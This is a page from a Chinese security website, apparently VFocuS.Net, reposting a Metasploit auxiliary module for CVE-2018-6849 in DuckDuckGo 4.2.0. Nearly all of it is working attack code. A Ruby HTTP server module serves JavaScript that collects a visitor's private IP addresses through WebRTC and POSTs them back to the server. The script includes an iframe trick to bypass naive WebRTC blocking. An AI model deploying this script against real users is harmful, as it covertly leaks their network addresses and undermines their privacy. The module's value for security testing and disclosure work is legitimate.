首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
DuckDuckGo 4.2.0 WebRTC Private IP Leakage
来源:metasploit.com 作者:Coles 发布时间:2018-04-04  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpServer

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name'           => "Private IP Leakage to WebPage using WebRTC Function.",
        'Description'    => %q(
          This module exploits a vulnerability in browsers using well-known property of WebRTC (Web Real-Time Communications) which enables Web applications and sites to capture or exchange arbitrary data between browsers without requiring an intermediary.
        ),
        'License'        => MSF_LICENSE,
        'Author'         => [
          'Brendan Coles', #MSF Module
          'Dhiraj Mishra'  #MSF Module
        ],
        'References'     => [
		[ 'CVE', '2018-6849' ],
		['URL', 'https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html']
        ],
        'DisclosureDate' => 'Jan 26 2018',
        'Actions'        => [[ 'WebServer' ]],
        'PassiveActions' => [ 'WebServer' ],
        'DefaultAction'  => 'WebServer'
      )
    )
  end

  def run
    exploit # start http server
  end

  def setup
     # code from: https://github.com/diafygi/webrtc-ips
     @html = <<-JS
<script>
//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var useWebKit = !!window.webkitRTCPeerConnection;

    //bypass naive webrtc blocking using an iframe
    if(!RTCPeerConnection){
        //NOTE: you need to have an iframe in the page right above the script tag
        //
        //<iframe id="iframe" sandbox="allow-same-origin" style="display: none"></iframe>
        //<script>...getIPs called in here...
        //
        var win = iframe.contentWindow;
        RTCPeerConnection = win.RTCPeerConnection
            || win.mozRTCPeerConnection
            || win.webkitRTCPeerConnection;
        useWebKit = !!win.webkitRTCPeerConnection;
    }

    //minimal requirements for data connection
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]
    };

    var servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    function handleCandidate(candidate){
        //match just the IP address
        var ip_regex = /([0-9]{1,3}(\\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/
        var ip_addr = ip_regex.exec(candidate)[1];

        //remove duplicates
        if(ip_dups[ip_addr] === undefined)
            callback(ip_addr);

        ip_dups[ip_addr] = true;
    }

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events
        if(ice.candidate)
            handleCandidate(ice.candidate.candidate);
    };

    //create a bogus data channel
    pc.createDataChannel("");

    //create an offer sdp
    pc.createOffer(function(result){

        //trigger the stun server request
        pc.setLocalDescription(result, function(){}, function(){});

    }, function(){});

    //wait for a while to let everything done
    setTimeout(function(){
        //read candidate info from local description
        var lines = pc.localDescription.sdp.split('\\n');

        lines.forEach(function(line){
            if(line.indexOf('a=candidate:') === 0)
                handleCandidate(line);
        });
    }, 1000);
}

getIPs(function(ip){
  //console.log(ip);
  var xmlhttp = new XMLHttpRequest;
  xmlhttp.open('POST', window.location, true);
  xmlhttp.send(ip);
});
</script>
     JS
  end

  def on_request_uri(cli, request)
    case request.method.downcase
    when 'get'
      print_status("#{cli.peerhost}: Sending response (#{@html.size} bytes)")
      send_response(cli, @html)
    when 'post'
      print_status("#{cli.peerhost}: Received reply:")
      puts request.to_s
    else
      print_error("#{cli.peerhost}: Unhandled method: #{request.method}")
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Moxa AWK-3131A 1.4 < 1.7 - 'Us
·ProcessMaker Plugin Code Execu
·Microsoft Edge Chakra JIT - St
·Microsoft Windows - Multiple U
·Microsoft Edge Chakra JIT - St
·Sophos Endpoint Protection 10.
·Google Chrome V8 - 'Genesis::I
·Sophos Endpoint Protection Con
·Google Chrome V8 - 'ElementsAc
·PMS 0.42 Stack-Based Buffer Ov
·Nginx 1.13.10 Accept-Encoding
·Adobe Flash 28.0.0.137 Remote
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved